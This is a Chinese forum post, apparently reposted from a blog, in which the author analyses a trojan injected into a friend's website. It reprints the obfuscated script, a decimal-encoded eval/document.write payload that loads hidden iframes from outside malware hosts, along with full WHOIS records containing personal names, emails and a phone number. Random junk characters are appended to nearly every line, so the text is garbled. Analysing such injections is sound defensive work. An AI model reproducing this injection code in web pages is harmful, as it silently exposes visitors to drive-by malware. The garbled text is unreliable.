[原创]一篇刚写的分析木马手记

首发在我的博客里面， %5uuB4P&|$  
m(&ZNZK  
http://www.areway.cn/?p=175 rb9x||  
txliZ|.O  
TpnkJygIm  
周末上线鸭子就Q我说他的站给挂了马，当时没太注意就直接打开了连接，截下了网页源码： &\5T`|~)!  
          =JEnK_@?K\  
<script>t=’60,105,102,114,97,109,101, 6C  
32,115,114,99,61,104,116,116,112,58,47,47, 3L#KHTM  
102,114,101,101,46,117,45,117,117,117,46,99, RJGf@am&  
110,47,101,114,114,111,114,46,104,116,109, 9m8`4%y=  
32,119,105,100,116,104,61,49,48,48,32,104, kH{axMNc  
101,105,103,104,116,61,48,62,60,47,105,102, 8XTVpf4  
114,97,109,101,62′; BV7GzJ2([{  
t=eval(’String.fromCharCode(’+t+’)');document.write(t);</script> }-Zfljj  
                                                                                                  ;}:"[B3$  
<script>t=’60,105,102,114,97,109,101,32,115,  EI+.Q  
114,99,61,104,116,116,112,58,47,47,102,114, (?~F}u v  
101,101,46,117,45,117,117,117,46,99,110,47, cU*7E39
 
101,114,114,111,114,46,104,116,109,32,119, *BSL=8G{  
105,100,116,104,61,49,48,48,32,104,101,105, Kr8p:$D};  
103,104,116,61,48,62,60,47,105,102,114,97, %Uuhi&PA-l  
109,101,62′;t=eval(’String.fromCharCode(’+t+’)'); =:#$_qR  
document.write(t);</script> B_:K.]DK`  
                                                                                                  VCh%v-/  
<html xmlns=” Amz7j8zJ  
http://www.w3.org/1999/xhtml {U&Mo97rzX  
“> S6Kaw  
<head> .*v8*8OJ&  
<!– Published By Newasp.cc 2007-12-7-18:03:23 –> %(
n4`@  
<meta http-equiv=”Content-Type” content=”text/html; charset=gb2312″ /> c?[A  
<title>首页 - 爱生活家庭网 koaH31Q  
                                                                                                                                                    ZfMJU  
上面有一段 script的十进制加密字段，里面的大概内容是，把所有的字符放在函数t里面，最后用doucment.write(t)来把字符串写在网页里面。 XD*$$`+#  
转换字符串后的大概内容是（谁点击后果自付）： B9+oI cO  
<script>t=’<iframe src=http://free.u-uuu.cn/error.htm width=……… Z\NC+{7k]  
                                                                                                                                  <m9IZIY<  
查询玉米u-uuu.cn的详细信息： PN<Y&/fB  
Domain Name: u-uuu.cn o%CBSm]  
ROID: 20070901s10001s64972306-cn 4(o0I~hpB?  
Domain Status: ok Vrz<DB^-e  
Registrant Organization: 王雷 #
E*jX-JT  
Registrant Name: 王雷 EV]exYWB  
Administrative Email: czlovexs@126.com >6(nW:I0y  
Sponsoring Registrar: 北京万网志成科技有限公司 `yc.A%5  
Name Server:ns.yovole.com 9t;aJFI  
Name Server:ns1.yovole.com
rMLCtGi  
Registration Date: 2007-09-01 17:54 CK
.Z-_M  
Expiration Date: 2008-09-01 17:54 K\o!  
最后PING了一下地址 都没有什么…. hcM 0?=  
                                                                                                oz@yF)/Sm  
上虚拟机里面继续分析，IE里面打开上面的连接…查看源代码…..直接又有嵌套. lOYwYMi  
<iframe src=http://www.foafau.info/ms15.htm width=1 height=1></iframe> dpTap<Noby  
<script language=”javascript” src=” I'J=I{p*  
http://count43.51yes.com/click.aspx?id=4333375720&logo=6″></script 9;q@;)'5  
> ~!Onz wmO  
这个玉米应该有可能是木马作者的： ^${-^w@,%V  
foafau.info的详细信息：  c~dX8+  
Access to INFO WHOIS information is provided to assist persons in ptrLnJ|%  
determining the contents of a domain name registration record in the <y~`J`-  
Afilias registry database. The data in this record is provided by Lt=#tu&d  
Afilias Limited for informational purposes only, and Afilias does not AvhmN5O=  
guarantee its accuracy.  This service is intended only for query-based u},<On  
access. You agree that you will use this data only for lawful purposes UPLr[>Q#  
and that, under no circumstances will you use this data to: (a) allow, wgI$'tI  
enable, or otherwise support the transmission by e-mail, telephone, or 2D&t
DX<  
facsimile of mass unsolicited, commercial advertising or solicitations KWU#Swa`  
to entities other than the data recipient’s own existing customers; or 6\'v_A O  
(b) enable high volume, automated, electronic processes that send 5P+
3D{  
queries or data to the systems of Registry Operator, a Registrar, or V .
$<  
Afilias except as reasonably necessary to register domain names or >WG$!o+R  
modify existing registrations. All rights reserved. Afilias reserves bCc^)o/w  
the right to modify these terms at any time. By submitting this query, ?6~RGg  
you agree to abide by this policy. 3"&6rdF\jB  
Domain ID:D22418703-LRMS
!%]]lxi  
Domain Name:FOAFAU.INFO MNkysB(  
Created On:20-Nov-2007 16:05:42 UTC ~"{Kjr#R  
Last Updated On:20-Nov-2007 16:05:44 UTC RM QlciG  
Expiration Date:20-Nov-2008 16:05:42 UTC [b
E9Y;  
Sponsoring Registrar:GoDaddy.com Inc. (R171-LRMS) 5Sk87o1E(d  
Status:CLIENT DELETE PROHIBITED qH"e: wgL  
Status:CLIENT RENEW PROHIBITED L +-B,466  
Status:CLIENT TRANSFER PROHIBITED { 5h6nYu  
Status:CLIENT UPDATE PROHIBITED Zj!S('hSY  
Status:TRANSFER PROHIBITED &eyFApM[Z  
Registrant ID:GODA-040110615 TQYud'u/  
Registrant Name:liu hong mtmtOG_/=  
Registrant Organization: ~(G]-__B<  
Registrant Street1:beijing F|Jo|02  
Registrant Street2: A*E$_N  
Registrant Street3: 4z?6[Cg<  
Registrant City:beijing %
p@A8'b  
Registrant State/Province: 1+Ja4`o,iS  
Registrant Postal Code:100000 RIb< 7  
Registrant Country:CN l$MX\  
Registrant Phone:+86.860108888777 &vd9\Pp  
Registrant Phone Ext.: [WC-EDO2lb  
Registrant FAX: v5 $"v?PT  
Registrant FAX Ext.: c tTbvXP  
Registrant Email:bbbshiji@163.com )|'? uN7  
Admin ID:GODA-240110615 q4lL7@_  
Admin Name:liu hong jbfMTb4  
Admin Organization: ow%s_yV]R  
Admin Street1:beijing F5{~2~Cw(  
Admin Street2: zgqe@;{  
Admin Street3: 8[ :FU  
Admin City:beijing A+NLo[swwu  
Admin State/Province: D",ZrwyJ  
Admin Postal Code:100000 )7[>/2aGd  
Admin Country:CN ka*VQXk*  
Admin Phone:+86.860108888777 '2v,!G]^  
Admin Phone Ext.: n%@xnB$ZX  
Admin FAX: )T 3y,*  
Admin FAX Ext.: lv,8NmP5  
Admin Email:bbbshiji@163.com x)nBy)<  
Billing ID:GODA-340110615 lOcvRF  
Billing Name:liu hong pOGVD  
Billing Organization: Y KeOH  
Billing Street1:beijing nBZqhtr  
Billing Street2: _9""3O  
Billing Street3: '<$(*  
Billing City:beijing $OmcEd  
Billing State/Province: dt^yEapjM  
Billing Postal Code:100000 ] E`J5o}op  
Billing Country:CN Qx'a+kLu9  
Billing Phone:+86.860108888777 W!V06.  
Billing Phone Ext.: Yq3(,  
Billing FAX: rsy'ZVLUj  
Billing FAX Ext.: n"d~UV^Uw  
Billing Email:bbbshiji@163.com NTls64AS.  
Tech ID:GODA-140110615 4|7L26,]5  
Tech Name:liu hong N{ ;{<C9Z  
Tech Organization: Y |n_Ro^~  
Tech Street1:beijing DJT)7l{  
Tech Street2: phEM1",4T  
Tech Street3: !Kd/ lDY  
Tech City:beijing *+lnAxRa?  
Tech State/Province:
`L7 cS  
Tech Postal Code:100000 sw8Ic
\vT  
Tech Country:CN o#Rao#bD:  
Tech Phone:+86.860108888777 __'Z0?.4#  
Tech Phone Ext.: F2OU[Z,-]  
Tech FAX: auaFP-$`f  
Tech FAX Ext.: ZXe[>H  
Tech Email:bbbshiji@163.com &I<R|a  
Name Server:NS27.DOMAINCONTROL.COM 2mVH*\D  
Name Server:NS28.DOMAINCONTROL.COM i#
iY;R8  
Name Server: !5Z?D8dcx  
Name Server: Su6ZO'[)  
Name Server: :G,GHU'/78  
Name Server:  H[fD >  
Name Server: zxTm`Dh;[
 
Name Server: xL=g(FN(6L  
Name Server: U~!97,|ic  
Name Server: FxD\F  
Name Server: X NnsMl  
Name Server: **dGK_^T0  
Name Server: mWta B>f  
                                                                                                          hFs0qPVY  
接着下载每个文件里面的代码： DV]Kd 7  
一步一步看.. ,TeDJ\k  
_nOio?  
!fyE Hk  
~)Ny8Dh  
OCY7Bls4  
XZJ}nXy  
都是十进制的代码，也懒得再分析了，有这个爱好的大家可以继续试试

看过了就是没看懂。。。

要是有全部 就好了 传上来